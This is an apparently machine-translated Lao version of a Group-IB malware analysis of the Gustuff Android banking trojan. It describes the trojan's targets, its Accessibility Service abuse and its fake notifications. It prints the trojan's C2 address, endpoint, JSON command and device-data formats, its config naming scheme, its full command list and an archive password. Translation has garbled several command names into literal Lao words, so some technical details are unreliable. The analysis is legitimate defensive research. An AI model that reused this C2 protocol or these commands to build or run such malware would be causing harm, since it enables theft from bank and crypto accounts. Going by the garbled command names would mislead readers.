🥇ວິທີ Android Trojan Gustuff skims ຄີມ (fiat ແລະ crypto) ຈາກບັນຊີຂອງທ່ານ

ພຽງແຕ່ມື້ອື່ນ Group-IB ແຈ້ງ ກ່ຽວກັບກິດຈະກໍາຂອງໂທລະສັບມືຖື Android Trojan Gustuff. ມັນເຮັດວຽກສະເພາະໃນຕະຫຼາດສາກົນ, ໂຈມຕີລູກຄ້າຂອງ 100 ທະນາຄານຕ່າງປະເທດທີ່ໃຫຍ່ທີ່ສຸດ, ຜູ້ໃຊ້ມືຖື 32 crypto wallets, ເຊັ່ນດຽວກັນກັບຊັບພະຍາກອນ e-commerce ຂະຫນາດໃຫຍ່. ແຕ່ຜູ້ພັດທະນາ Gustuff ແມ່ນອາຊະຍາກຳທາງອິນເຕີເນັດທີ່ເວົ້າພາສາລັດເຊຍພາຍໃຕ້ຊື່ຫຼິ້ນວ່າ Bestoffer. ຈົນກ່ວາບໍ່ດົນມານີ້, ລາວໄດ້ຍົກຍ້ອງ Trojan ຂອງລາວເປັນ "ຜະລິດຕະພັນທີ່ຮ້າຍແຮງສໍາລັບຜູ້ທີ່ມີຄວາມຮູ້ແລະປະສົບການ."

ຜູ້ຊ່ຽວຊານການວິເຄາະລະຫັດທີ່ເປັນອັນຕະລາຍຢູ່ Group-IB Ivan Pisarev ໃນການຄົ້ນຄວ້າຂອງລາວ, ລາວເວົ້າຢ່າງລະອຽດກ່ຽວກັບວິທີການເຮັດວຽກຂອງ Gustuff ແລະອັນຕະລາຍຂອງມັນແມ່ນຫຍັງ.

Gustuff ລ່າຫາໃຜ?

Gustuff ເປັນຂອງ malware ລຸ້ນໃຫມ່ທີ່ມີຟັງຊັນອັດຕະໂນມັດຢ່າງເຕັມສ່ວນ. ອີງຕາມຜູ້ພັດທະນາ, Trojan ໄດ້ກາຍເປັນ malware AndyBot ຮຸ່ນໃຫມ່ແລະປັບປຸງໃຫມ່, ເຊິ່ງນັບຕັ້ງແຕ່ເດືອນພະຈິກ 2017 ໄດ້ໂຈມຕີໂທລະສັບ Android ແລະລັກເງິນຜ່ານ phishing web forms masquerading ເປັນແອັບພລິເຄຊັນມືຖືຂອງທະນາຄານສາກົນທີ່ມີຊື່ສຽງແລະລະບົບການຊໍາລະເງິນ. Bestoffer ລາຍງານວ່າລາຄາເຊົ່າ Gustuff Bot ແມ່ນ $800 ຕໍ່ເດືອນ.

ການວິເຄາະຕົວຢ່າງຂອງ Gustuff ສະແດງໃຫ້ເຫັນວ່າ Trojan ມີທ່າແຮງທີ່ຈະເປົ້າຫມາຍລູກຄ້າໂດຍໃຊ້ແອັບພລິເຄຊັນມືຖືຂອງທະນາຄານທີ່ໃຫຍ່ທີ່ສຸດ, ເຊັ່ນ: Bank of America, Bank of Scotland, JPMorgan, Wells Fargo, Capital One, TD Bank, PNC Bank, ເຊັ່ນດຽວກັນກັບກະເປົາເງິນ crypto. Bitcoin Wallet, BitPay, Cryptopay, Coinbase, ແລະອື່ນໆ.

ໃນເບື້ອງຕົ້ນສ້າງເປັນ Trojan ທະນາຄານຄລາສສິກ, ໃນສະບັບປະຈຸບັນ Gustuff ໄດ້ຂະຫຍາຍຢ່າງຫຼວງຫຼາຍບັນຊີລາຍຊື່ຂອງເປົ້າຫມາຍການໂຈມຕີ. ນອກເຫນືອຈາກແອັບພລິເຄຊັນ Android ສໍາລັບທະນາຄານ, ບໍລິສັດ fintech ແລະບໍລິການ crypto, Gustuff ແມ່ນແນໃສ່ຜູ້ໃຊ້ຂອງແອັບພລິເຄຊັນໃນຕະຫລາດ, ຮ້ານຄ້າອອນໄລນ໌, ລະບົບການຈ່າຍເງິນແລະຜູ້ສົ່ງຂ່າວທັນທີ. ໂດຍສະເພາະ, PayPal, Western Union, eBay, Walmart, Skype, WhatsApp, Gett Taxi, Revolut ແລະອື່ນໆ.

ຈຸດເຂົ້າ: ການຄິດໄລ່ສໍາລັບການຕິດເຊື້ອມະຫາຊົນ

Gustuff ມີລັກສະນະເປັນ vector "ຄລາສສິກ" ຂອງການເຈາະເຂົ້າໄປໃນໂທລະສັບສະຫຼາດ Android ໂດຍຜ່ານທາງໄປສະນີ SMS ທີ່ມີການເຊື່ອມຕໍ່ກັບ APKs. ເມື່ອອຸປະກອນ Android ຕິດເຊື້ອ Trojan ຕາມຄໍາສັ່ງຂອງເຄື່ອງແມ່ຂ່າຍ, Gustuff ອາດຈະແຜ່ຂະຫຍາຍຕື່ມອີກໂດຍຜ່ານຖານຂໍ້ມູນຕິດຕໍ່ຂອງໂທລະສັບທີ່ຕິດເຊື້ອຫຼືຜ່ານຖານຂໍ້ມູນຂອງເຄື່ອງແມ່ຂ່າຍ. ການທໍາງານຂອງ Gustuff ຖືກອອກແບບມາສໍາລັບການຕິດເຊື້ອມະຫາຊົນແລະການລົງທືນສູງສຸດຂອງທຸລະກິດຂອງຜູ້ປະຕິບັດງານຂອງຕົນ - ມັນມີຫນ້າທີ່ "ຕື່ມອັດຕະໂນມັດ" ເປັນເອກະລັກເຂົ້າໃນຄໍາຮ້ອງສະຫມັກທະນາຄານມືຖືທີ່ຖືກຕ້ອງຕາມກົດຫມາຍແລະກະເປົາເງິນ crypto, ເຊິ່ງຊ່ວຍໃຫ້ທ່ານສາມາດເລັ່ງແລະຂະຫຍາຍການລັກເງິນ.

ການສຶກສາຂອງ Trojan ສະແດງໃຫ້ເຫັນວ່າຟັງຊັນ autofill ໄດ້ຖືກປະຕິບັດຢູ່ໃນມັນໂດຍໃຊ້ Accessibility Service, ການບໍລິການສໍາລັບຄົນພິການ. Gustuff ບໍ່ແມ່ນ Trojan ທໍາອິດທີ່ປະສົບຜົນສໍາເລັດຂ້າມການປ້ອງກັນປະຕິສໍາພັນກັບອົງປະກອບປ່ອງຢ້ຽມຂອງແອັບພລິເຄຊັນອື່ນທີ່ໃຊ້ບໍລິການ Android ນີ້. ຢ່າງໃດກໍຕາມ, ການນໍາໃຊ້ການບໍລິການການເຂົ້າເຖິງປະສົມປະສານກັບເຄື່ອງເຕີມເຕັມລົດແມ່ນຍັງຂ້ອນຂ້າງຫາຍາກ.

ຫຼັງຈາກການດາວໂຫຼດກັບໂທລະສັບຂອງຜູ້ເຄາະຮ້າຍ, Gustuff, ການນໍາໃຊ້ການບໍລິການການເຂົ້າເຖິງ, ສາມາດພົວພັນກັບອົງປະກອບປ່ອງຢ້ຽມຂອງຄໍາຮ້ອງສະຫມັກອື່ນໆ (ທະນາຄານ, cryptocurrency, ເຊັ່ນດຽວກັນກັບຄໍາຮ້ອງສະຫມັກສໍາລັບການຊື້ເຄື່ອງອອນໄລນ໌, ການສົ່ງຂໍ້ຄວາມ, ແລະອື່ນໆ), ປະຕິບັດການປະຕິບັດທີ່ຈໍາເປັນສໍາລັບຜູ້ໂຈມຕີ. . ຕົວຢ່າງເຊັ່ນ, ຢູ່ຄໍາສັ່ງຂອງເຄື່ອງແມ່ຂ່າຍ, Trojan ສາມາດກົດປຸ່ມຕ່າງໆແລະປ່ຽນຄ່າຂອງຊ່ອງຂໍ້ຄວາມໃນຄໍາຮ້ອງສະຫມັກທະນາຄານ. ການນໍາໃຊ້ກົນໄກການບໍລິການການເຂົ້າເຖິງອະນຸຍາດໃຫ້ Trojan ຜ່ານກົນໄກຄວາມປອດໄພທີ່ໃຊ້ໂດຍທະນາຄານເພື່ອຕ້ານ Trojan ມືຖືລຸ້ນກ່ອນ, ເຊັ່ນດຽວກັນກັບການປ່ຽນແປງນະໂຍບາຍຄວາມປອດໄພທີ່ປະຕິບັດໂດຍ Google ໃນ Android OS ຮຸ່ນໃຫມ່. ດັ່ງນັ້ນ, Gustuff "ຮູ້ວິທີ" ເພື່ອປິດການປົກປ້ອງ Google Protect: ອີງຕາມຜູ້ຂຽນ, ຫນ້າທີ່ນີ້ເຮັດວຽກຢູ່ໃນ 70% ຂອງກໍລະນີ.

Gustuff ຍັງສາມາດສະແດງການແຈ້ງເຕືອນ PUSH ປອມທີ່ມີໄອຄອນຂອງແອັບພລິເຄຊັນມືຖືທີ່ຖືກຕ້ອງຕາມກົດຫມາຍ. ຜູ້ໃຊ້ຄລິກໃສ່ການແຈ້ງເຕືອນ PUSH ແລະເຫັນປ່ອງຢ້ຽມ phishing ດາວໂຫຼດຈາກເຄື່ອງແມ່ຂ່າຍ, ບ່ອນທີ່ລາວເຂົ້າໄປໃນບັດທະນາຄານທີ່ຮ້ອງຂໍຫຼືຂໍ້ມູນ crypto wallet. ໃນສະຖານະການ Gustuff ອື່ນ, ແອັບພລິເຄຊັນໃນນາມຂອງການແຈ້ງເຕືອນ PUSH ຖືກສະແດງຖືກເປີດ. ໃນກໍລະນີນີ້, malware, ຕາມຄໍາສັ່ງຈາກເຄື່ອງແມ່ຂ່າຍໂດຍຜ່ານການບໍລິການການເຂົ້າເຖິງ, ສາມາດຕື່ມຂໍ້ມູນໃສ່ໃນຊ່ອງແບບຟອມຂອງຄໍາຮ້ອງສະຫມັກທະນາຄານສໍາລັບການສໍ້ໂກງທຸລະກໍາ.

ການທໍາງານຂອງ Gustuff ຍັງປະກອບມີການສົ່ງຂໍ້ມູນກ່ຽວກັບອຸປະກອນທີ່ຕິດເຊື້ອໄປຫາເຄື່ອງແມ່ຂ່າຍ, ຄວາມສາມາດໃນການອ່ານ / ສົ່ງຂໍ້ຄວາມ SMS, ການສົ່ງຄໍາຮ້ອງຂໍ USSD, ເປີດຕົວ SOCKS5 Proxy, ຕິດຕາມການເຊື່ອມຕໍ່, ສົ່ງໄຟລ໌ (ລວມທັງການສະແກນຮູບພາບຂອງເອກະສານ, screenshots, ຮູບຖ່າຍ) ໄປຫາ. ເຊີບເວີ, ຣີເຊັດອຸປະກອນເປັນການຕັ້ງຄ່າໂຮງງານ.

ການວິເຄາະ Malware

ກ່ອນທີ່ຈະຕິດຕັ້ງຄໍາຮ້ອງສະຫມັກທີ່ເປັນອັນຕະລາຍ, Android OS ສະແດງໃຫ້ຜູ້ໃຊ້ປ່ອງຢ້ຽມທີ່ມີບັນຊີລາຍຊື່ຂອງສິດທີ່ຮ້ອງຂໍໂດຍ Gustuff:

ແອັບພລິເຄຊັນຈະຖືກຕິດຕັ້ງຫຼັງຈາກໄດ້ຮັບການຍິນຍອມຈາກຜູ້ໃຊ້ເທົ່ານັ້ນ. ຫຼັງຈາກການເປີດຕົວແອັບພລິເຄຊັນ, Trojan ຈະສະແດງໃຫ້ຜູ້ໃຊ້ເຫັນປ່ອງຢ້ຽມ:

ຫຼັງຈາກນັ້ນມັນຈະເອົາໄອຄອນຂອງມັນອອກ.

Gustuff ແມ່ນບັນຈຸ, ອີງຕາມຜູ້ຂຽນ, ໂດຍຜູ້ຫຸ້ມຫໍ່ຈາກ FTT. ຫຼັງຈາກການເລີ່ມຕົ້ນ, ແອັບພລິເຄຊັນຈະຕິດຕໍ່ກັບເຊີບເວີ CnC ເປັນໄລຍະເພື່ອຮັບຄໍາສັ່ງ. ຫຼາຍໆໄຟລ໌ທີ່ພວກເຮົາກວດສອບໄດ້ໃຊ້ທີ່ຢູ່ IP ເປັນເຄື່ອງແມ່ຂ່າຍຄວບຄຸມ 88.99.171[.]105 (ຕໍ່ໄປນີ້ພວກເຮົາຈະໝາຍເຖິງມັນ <%CnC%>).

ຫຼັງຈາກເປີດຕົວ, ໂຄງການເລີ່ມຕົ້ນສົ່ງຂໍ້ຄວາມໄປຫາເຄື່ອງແມ່ຂ່າຍ http://<%CnC%>/api/v1/get.php.

ການຕອບສະ ໜອງ ຄາດວ່າຈະເປັນ JSON ໃນຮູບແບບຕໍ່ໄປນີ້:

{
    "results" : "OK",
    "command":{
        "id": "<%id%>",
        "command":"<%command%>",
        "timestamp":"<%Server Timestamp%>",
        "params":{
		<%Command parameters as JSON%>
        },
    },
}

ແຕ່ລະຄັ້ງທີ່ແອັບພລິເຄຊັນຖືກເຂົ້າເຖິງ, ມັນຈະສົ່ງຂໍ້ມູນກ່ຽວກັບອຸປະກອນທີ່ຕິດເຊື້ອ. ຮູບແບບຂໍ້ຄວາມແມ່ນສະແດງໃຫ້ເຫັນຂ້າງລຸ່ມນີ້. ມັນເປັນມູນຄ່າທີ່ສັງເກດວ່າທົ່ງນາ ຢ່າງເຕັມທີ່, ພິເສດ, ກິດ и ການອະນຸຍາດ - ທາງເລືອກແລະຈະຖືກສົ່ງພຽງແຕ່ໃນກໍລະນີຂອງຄໍາສັ່ງຮ້ອງຂໍຈາກ CnC.

{
    "info":
    {
        "info":
        {
            "cell":<%Sim operator name%>,
            "country":<%Country ISO%>,
            "imei":<%IMEI%>,
            "number":<%Phone number%>,
            "line1Number":<%Phone number%>,
            "advertisementId":<%ID%>
        },
        "state":
        {
            "admin":<%Has admin rights%>,
            "source":<%String%>,
            "needPermissions":<%Application needs permissions%>,
            "accesByName":<%Boolean%>,
            "accesByService":<%Boolean%>,
            "safetyNet":<%String%>,
            "defaultSmsApp":<%Default Sms Application%>,
            "isDefaultSmsApp":<%Current application is Default Sms Application%>,
            "dateTime":<%Current date time%>,
            "batteryLevel":<%Battery level%>
        },
        "socks":
        {
            "id":<%Proxy module ID%>,
            "enabled":<%Is enabled%>,
            "active":<%Is active%>
        },
        "version":
        {
            "versionName":<%Package Version Name%>,
            "versionCode":<%Package Version Code%>,
            "lastUpdateTime":<%Package Last Update Time%>,
            "tag":<%Tag, default value: "TAG"%>,
            "targetSdkVersion":<%Target Sdk Version%>,
            "buildConfigTimestamp":1541309066721
        },
    },
    "full":
    {
        "model":<%Device Model%>,
        "localeCountry":<%Country%>,
        "localeLang":<%Locale language%>,
        "accounts":<%JSON array, contains from "name" and "type" of accounts%>,
        "lockType":<%Type of lockscreen password%>
    },
    "extra":
    {
        "serial":<%Build serial number%>,
        "board":<%Build Board%>,
        "brand":<%Build Brand%>,
        "user":<%Build User%>,
        "device":<%Build Device%>,
        "display":<%Build Display%>,
        "id":<%Build ID%>,
        "manufacturer":<%Build manufacturer%>,
        "model":<%Build model%>,
        "product":<%Build product%>,
        "tags":<%Build tags%>,
        "type":<%Build type%>,
        "imei":<%imei%>,
        "imsi":<%imsi%>,
        "line1number":<%phonenumber%>,
        "iccid":<%Sim serial number%>,
        "mcc":<%Mobile country code of operator%>,
        "mnc":<%Mobile network codeof operator%>,
        "cellid":<%GSM-data%>,
        "lac":<%GSM-data%>,
        "androidid":<%Android Id%>,
        "ssid":<%Wi-Fi SSID%>
    },
    "apps":{<%List of installed applications%>},
    "permission":<%List of granted permissions%>
}

ການເກັບຮັກສາຂໍ້ມູນການຕັ້ງຄ່າ

Gustuff ເກັບຮັກສາຂໍ້ມູນທີ່ສໍາຄັນໃນການປະຕິບັດງານຢູ່ໃນໄຟລ໌ທີ່ຕ້ອງການ. ຊື່ໄຟລ໌, ເຊັ່ນດຽວກັນກັບຊື່ຂອງຕົວກໍານົດການຢູ່ໃນນັ້ນ, ແມ່ນຜົນມາຈາກການຄິດໄລ່ຜົນລວມ MD5 ຈາກສະຕຣິງ. 15413090667214.6.1<%name%>ບ່ອນທີ່ <%name%> - ຊື່ຕົ້ນມູນຄ່າ. ການຕີຄວາມໝາຍຂອງ Python ຂອງຟັງຊັນການສ້າງຊື່:

 nameGenerator(input):
    output = md5("15413090667214.6.1" + input)

ໃນສິ່ງທີ່ຕໍ່ໄປນີ້ພວກເຮົາຈະຫມາຍເຖິງມັນ nameGenerator(ປ້ອນຂໍ້ມູນ).
ດັ່ງນັ້ນຊື່ໄຟລ໌ທໍາອິດແມ່ນ: nameGenerator("API_SERVER_LIST"), ມັນປະກອບດ້ວຍຄ່າທີ່ມີຊື່ຕໍ່ໄປນີ້:

ຊື່ຕົວແປ	ມູນຄ່າ
nameGenerator("API_SERVER_LIST")	ປະກອບມີບັນຊີລາຍຊື່ຂອງທີ່ຢູ່ CnC ໃນຮູບແບບຂອງອາເຣ.
nameGenerator("API_SERVER_URL")	ປະກອບດ້ວຍທີ່ຢູ່ CnC.
nameGenerator("SMS_UPLOAD")	ທຸງຖືກຕັ້ງເປັນຄ່າເລີ່ມຕົ້ນ. ຖ້າທຸງຖືກຕັ້ງ, ສົ່ງຂໍ້ຄວາມ SMS ໄປ CnC.
nameGenerator("SMS_ROOT_NUMBER")	ເບີໂທລະສັບທີ່ຂໍ້ຄວາມ SMS ໄດ້ຮັບໂດຍອຸປະກອນທີ່ຕິດເຊື້ອຈະຖືກສົ່ງ. ຄ່າເລີ່ມຕົ້ນແມ່ນ null.
nameGenerator("SMS_ROOT_NUMBER_RESEND")	ທຸງຖືກລຶບລ້າງໂດຍຄ່າເລີ່ມຕົ້ນ. ຖ້າຕິດຕັ້ງ, ເມື່ອອຸປະກອນທີ່ຕິດເຊື້ອໄດ້ຮັບ SMS, ມັນຈະຖືກສົ່ງໄປຫາເລກຮາກ.
nameGenerator("DEFAULT_APP_SMS")	ທຸງຖືກລຶບລ້າງໂດຍຄ່າເລີ່ມຕົ້ນ. ຖ້າທຸງນີ້ຖືກຕັ້ງ, ແອັບພລິເຄຊັນຈະປະມວນຜົນຂໍ້ຄວາມ SMS ຂາເຂົ້າ.
nameGenerator("DEFAULT_ADMIN")	ທຸງຖືກລຶບລ້າງໂດຍຄ່າເລີ່ມຕົ້ນ. ຖ້າທຸງຖືກຕັ້ງ, ແອັບພລິເຄຊັນມີສິດຜູ້ເບິ່ງແຍງລະບົບ.
nameGenerator("DEFAULT_ACCESSIBILITY")	ທຸງຖືກລຶບລ້າງໂດຍຄ່າເລີ່ມຕົ້ນ. ຖ້າທຸງຖືກຕັ້ງ, ການບໍລິການທີ່ໃຊ້ການບໍລິການຊ່ວຍເຂົ້າເຖິງກໍາລັງເຮັດວຽກຢູ່.
nameGenerator("APPS_CONFIG")	ວັດຖຸ JSON ທີ່ປະກອບດ້ວຍລາຍການຄຳສັ່ງທີ່ຕ້ອງເຮັດເມື່ອເຫດການການຊ່ວຍເຂົ້າເຖິງທີ່ກ່ຽວຂ້ອງກັບແອັບພລິເຄຊັນໃດນຶ່ງຖືກກະຕຸ້ນ.
nameGenerator("APPS_INSTALLED")	ເກັບຮັກສາລາຍຊື່ຂອງແອັບພລິເຄຊັນທີ່ຕິດຕັ້ງຢູ່ໃນອຸປະກອນ.
nameGenerator("IS_FIST_RUN")	ທຸງຖືກຣີເຊັດໃນຕອນເລີ່ມຕົ້ນທຳອິດ.
nameGenerator("UNIQUE_ID")	ປະກອບມີຕົວລະບຸທີ່ເປັນເອກະລັກ. ສ້າງຂຶ້ນເມື່ອ bot ຖືກເປີດຕົວຄັ້ງທໍາອິດ.

ໂມດູນສໍາລັບການປະມວນຜົນຄໍາສັ່ງຈາກເຄື່ອງແມ່ຂ່າຍ

ແອັບພລິເຄຊັນເກັບຮັກສາທີ່ຢູ່ຂອງເຄື່ອງແມ່ຂ່າຍ CnC ໃນຮູບແບບຂອງ array ທີ່ເຂົ້າລະຫັດໂດຍ ພື້ນຖານ 85 ສາຍ. ບັນຊີລາຍຊື່ຂອງເຄື່ອງແມ່ຂ່າຍ CnC ສາມາດປ່ຽນແປງໄດ້ເມື່ອໄດ້ຮັບຄໍາສັ່ງທີ່ເຫມາະສົມ, ໃນກໍລະນີນີ້, ທີ່ຢູ່ຈະຖືກເກັບໄວ້ໃນໄຟລ໌ທີ່ຕ້ອງການ.

ໃນການຕອບສະຫນອງຕໍ່ການຮ້ອງຂໍ, ເຄື່ອງແມ່ຂ່າຍສົ່ງຄໍາສັ່ງໄປຫາແອັບພລິເຄຊັນ. ມັນເປັນມູນຄ່າທີ່ສັງເກດວ່າຄໍາສັ່ງແລະພາລາມິເຕີຖືກນໍາສະເຫນີໃນຮູບແບບ JSON. ແອັບພລິເຄຊັນສາມາດປະມວນຜົນຄຳສັ່ງຕໍ່ໄປນີ້:

ທີມງານ	ລາຍລະອຽດ
forwardStart	ເລີ່ມການສົ່ງຂໍ້ຄວາມ SMS ທີ່ໄດ້ຮັບໂດຍອຸປະກອນທີ່ຕິດເຊື້ອໄປຫາເຄື່ອງແມ່ຂ່າຍ CnC.
forwardStop	ຢຸດການສົ່ງຂໍ້ຄວາມ SMS ທີ່ໄດ້ຮັບໂດຍອຸປະກອນທີ່ຕິດເຊື້ອໄປຫາເຄື່ອງແມ່ຂ່າຍ CnC.
ussdRun	ປະຕິບັດການຮ້ອງຂໍ USSD. ຕົວເລກທີ່ທ່ານຕ້ອງການເຮັດການຮ້ອງຂໍ USSD ແມ່ນຢູ່ໃນຊ່ອງ JSON "ຕົວເລກ".
ສົ່ງSms	ສົ່ງຂໍ້ຄວາມ SMS ຫນຶ່ງ (ຖ້າຈໍາເປັນ, ຂໍ້ຄວາມຖືກ "ແຍກ" ອອກເປັນບາງສ່ວນ). ເປັນພາລາມິເຕີ, ຄໍາສັ່ງຈະເອົາວັດຖຸ JSON ທີ່ມີຊ່ອງໃສ່ຂໍ້ມູນ "ເຖິງ" - ຕົວເລກປາຍທາງແລະ "ຮ່າງກາຍ" - ເນື້ອໃນຂອງຂໍ້ຄວາມ.
ສົ່ງSmsAb	ສົ່ງຂໍ້ຄວາມ SMS (ຖ້າຈໍາເປັນ, ຂໍ້ຄວາມຖືກ "ແຍກ" ເປັນສ່ວນຕ່າງໆ) ໄປຫາທຸກໆຄົນໃນບັນຊີລາຍຊື່ຕິດຕໍ່ຂອງອຸປະກອນທີ່ຕິດເຊື້ອ. ໄລຍະຫ່າງລະຫວ່າງການສົ່ງຂໍ້ຄວາມແມ່ນ 10 ວິນາທີ. ເນື້ອໃນຂອງຂໍ້ຄວາມແມ່ນຢູ່ໃນຊ່ອງ JSON "ຮ່າງກາຍ"
ສົ່ງSmsMass	ສົ່ງຂໍ້ຄວາມ SMS (ຖ້າຈໍາເປັນ, ຂໍ້ຄວາມຖືກ "ແຍກ" ເປັນສ່ວນຕ່າງໆ) ໄປຫາຜູ້ຕິດຕໍ່ທີ່ລະບຸໄວ້ໃນຕົວກໍານົດຄໍາສັ່ງ. ໄລຍະຫ່າງລະຫວ່າງການສົ່ງຂໍ້ຄວາມແມ່ນ 10 ວິນາທີ. ເປັນພາລາມິເຕີ, ຄໍາສັ່ງຈະເອົາອາເຣ JSON (ພາກສະຫນາມ "sms"), ອົງປະກອບທີ່ມີຊ່ອງຂໍ້ມູນ "ເຖິງ" - ຕົວເລກປາຍທາງແລະ "ຮ່າງກາຍ" - ເນື້ອໃນຂອງຂໍ້ຄວາມ.
ປ່ຽນເຊີບເວີ	ຄໍາສັ່ງນີ້ສາມາດເອົາຄ່າກັບ "url" ທີ່ສໍາຄັນເປັນພາລາມິເຕີ - ຫຼັງຈາກນັ້ນ bot ຈະປ່ຽນຄ່າຂອງ nameGenerator ("SERVER_URL"), ຫຼື "array" - ຫຼັງຈາກນັ້ນ bot ຈະຂຽນ array ກັບ nameGenerator ("API_SERVER_LIST") ດັ່ງນັ້ນ, ແອັບພລິເຄຊັນຈະປ່ຽນທີ່ຢູ່ຂອງເຊີບເວີ CnC.
ໝາຍເລກຜູ້ເບິ່ງແຍງ	ຄໍາສັ່ງຖືກອອກແບບມາເພື່ອເຮັດວຽກກັບຈໍານວນຮາກ. ຄໍາສັ່ງຍອມຮັບວັດຖຸ JSON ທີ່ມີພາລາມິເຕີຕໍ່ໄປນີ້: “number” — change nameGenerator(“ROOT_NUMBER”) ເປັນຄ່າທີ່ໄດ້ຮັບ, “reend” — change nameGenerator(“SMS_ROOT_NUMBER_RESEND”), “sendId” — ສົ່ງໄປທີ່ nameGenerator(“ROOT_NUMBER” ) ID ເອກະລັກ.
ອັບເດດຂໍ້ມູນ	ສົ່ງຂໍ້ມູນກ່ຽວກັບອຸປະກອນທີ່ຕິດເຊື້ອໄປຫາເຄື່ອງແມ່ຂ່າຍ.
ເຊັດຂໍ້ມູນ	ຄໍາສັ່ງມີຈຸດປະສົງເພື່ອລຶບຂໍ້ມູນຜູ້ໃຊ້. ອີງຕາມຊື່ທີ່ແອັບພລິເຄຊັນຖືກເປີດຕົວ, ຂໍ້ມູນຈະຖືກລຶບຖິ້ມຢ່າງສົມບູນດ້ວຍການປິດເປີດອຸປະກອນ (ຜູ້ໃຊ້ຫຼັກ), ຫຼືພຽງແຕ່ຂໍ້ມູນຜູ້ໃຊ້ຖືກລຶບ (ຜູ້ໃຊ້ສຳຮອງ).
ຖົງຕີນເລີ່ມຕົ້ນ	ເປີດໃຊ້ໂມດູນຕົວແທນ. ການດໍາເນີນງານຂອງໂມດູນໄດ້ຖືກອະທິບາຍຢູ່ໃນພາກແຍກຕ່າງຫາກ.
ຖົງຕີນຢຸດ	ຢຸດໂມດູນຕົວແທນ.
ເປີດລິ້ງ	ປະຕິບັດຕາມການເຊື່ອມຕໍ່. ການເຊື່ອມຕໍ່ແມ່ນຢູ່ໃນຕົວກໍານົດການ JSON ພາຍໃຕ້ປຸ່ມ "url". “android.intent.action.VIEW” ຖືກໃຊ້ເພື່ອເປີດລິ້ງ.
uploadAllSms	ສົ່ງຂໍ້ຄວາມ SMS ທັງໝົດທີ່ໄດ້ຮັບໂດຍອຸປະກອນໄປຫາເຊີບເວີ.
ອັບໂຫຼດຮູບທັງໝົດ	ສົ່ງຮູບພາບຈາກອຸປະກອນທີ່ຕິດເຊື້ອໄປຫາ URL. URL ມາເປັນພາລາມິເຕີ.
ອັບໂຫລດໄຟລ໌	ສົ່ງໄຟລ໌ໄປຫາ URL ຈາກອຸປະກອນທີ່ຕິດເຊື້ອ. URL ມາເປັນພາລາມິເຕີ.
ອັບໂຫຼດເບີໂທລະສັບ	ສົ່ງເບີໂທລະສັບຈາກລາຍຊື່ຕິດຕໍ່ຂອງທ່ານໄປຫາເຊີບເວີ. ຖ້າຄ່າວັດຖຸ JSON ທີ່ມີລະຫັດ “ab” ໄດ້ຮັບເປັນພາລາມິເຕີ, ແອັບພລິເຄຊັນຈະໄດ້ຮັບລາຍຊື່ຜູ້ຕິດຕໍ່ຈາກປຶ້ມໂທລະສັບ. ຖ້າວັດຖຸ JSON ທີ່ມີລະຫັດ “sms” ໄດ້ຮັບເປັນພາລາມິເຕີ, ແອັບພລິເຄຊັນຈະອ່ານລາຍຊື່ຜູ້ຕິດຕໍ່ຈາກຜູ້ສົ່ງຂໍ້ຄວາມ SMS.
ປ່ຽນແຟ້ມຈັດເກັບ	ແອັບພລິເຄຊັນດາວໂຫລດໄຟລ໌ຈາກທີ່ຢູ່ທີ່ມາເປັນພາລາມິເຕີໂດຍໃຊ້ປຸ່ມ "url". ໄຟລ໌ທີ່ດາວໂຫຼດມາຖືກບັນທຶກໄວ້ດ້ວຍຊື່ “archive.zip”. ຫຼັງຈາກນັ້ນ, ແອັບພລິເຄຊັນຈະ unzip ໄຟລ໌, ທາງເລືອກໃນການໃຊ້ລະຫັດຜ່ານ "b5jXh37gxgHBrZhQ4j3D". ໄຟລ໌ unzipped ຈະຖືກບັນທຶກໄວ້ໃນ [external storage]/hgps directory. ໃນໄດເລກະທໍລີນີ້, ແອັບພລິເຄຊັນເກັບຮັກສາການປອມແປງເວັບ (ອະທິບາຍຂ້າງລຸ່ມນີ້).
ຫຸ້ນ	ຄໍາສັ່ງຖືກອອກແບບມາເພື່ອເຮັດວຽກກັບບໍລິການປະຕິບັດງານ, ເຊິ່ງໄດ້ອະທິບາຍຢູ່ໃນພາກແຍກຕ່າງຫາກ.
ການທົດສອບ	ບໍ່ເຮັດຫຍັງເລີຍ.
ດາວໂຫລດ	ຄໍາສັ່ງແມ່ນມີຈຸດປະສົງເພື່ອດາວໂຫລດໄຟລ໌ຈາກເຄື່ອງແມ່ຂ່າຍຫ່າງໄກສອກຫຼີກແລະບັນທຶກມັນໃສ່ໄດເລກະທໍລີ "ດາວໂຫລດ". URL ແລະຊື່ໄຟລ໌ມາເປັນພາລາມິເຕີ, ຊ່ອງຂໍ້ມູນໃນວັດຖຸພາລາມິເຕີ JSON, ຕາມລໍາດັບ: "url" ແລະ "fileName".
ເອົາ	ເອົາໄຟລ໌ອອກຈາກໄດເລກະທໍລີ "ດາວໂຫລດ". ຊື່ໄຟລ໌ມາຢູ່ໃນພາລາມິເຕີ JSON ທີ່ມີລະຫັດ "fileName". ຊື່ໄຟລ໌ມາດຕະຖານແມ່ນ “tmp.apk”.
ການແຈ້ງເຕືອນ	ສະແດງການແຈ້ງການທີ່ມີຄໍາອະທິບາຍແລະບົດເລື່ອງຫົວຂໍ້ກໍານົດໂດຍເຊີເວີການຄຸ້ມຄອງ.

ຮູບແບບຄໍາສັ່ງ ການແຈ້ງເຕືອນ:

{
    "results" : "OK",
    "command":{
    "id": <%id%>,
    "command":"notification",
    "timestamp":<%Server Timestamp%>,
    "params":{
        "openApp":<%Open original app or not%>,
        "array":[
                      {"title":<%Title text%>,
                      "desc":<%Description text%>,
                      "app":<%Application name%>}
                   ]
                   },
        },
}

ການແຈ້ງເຕືອນທີ່ສ້າງຂຶ້ນໂດຍໄຟລ໌ທີ່ຢູ່ພາຍໃຕ້ການສືບສວນເບິ່ງຄືກັບການແຈ້ງເຕືອນທີ່ສ້າງຂຶ້ນໂດຍແອັບພລິເຄຊັນທີ່ລະບຸໄວ້ໃນຊ່ອງຂໍ້ມູນ app. ຖ້າຄ່າພາກສະຫນາມ ເປີດແອັບ — ທີ່ຈິງ, ໃນເວລາທີ່ການແຈ້ງການໄດ້ຖືກເປີດ, ຄໍາຮ້ອງສະຫມັກທີ່ລະບຸໄວ້ໃນພາກສະຫນາມໄດ້ຖືກເປີດ app. ຖ້າຄ່າພາກສະຫນາມ ເປີດແອັບ — ຜິດ, ຈາກນັ້ນ:

ປ່ອງຢ້ຽມ phishing ເປີດຂຶ້ນ, ເນື້ອໃນຂອງທີ່ໄດ້ຖືກດາວໂຫຼດຈາກລະບົບ <%ບ່ອນເກັບຂໍ້ມູນພາຍນອກ%>/hgps/<%filename%>
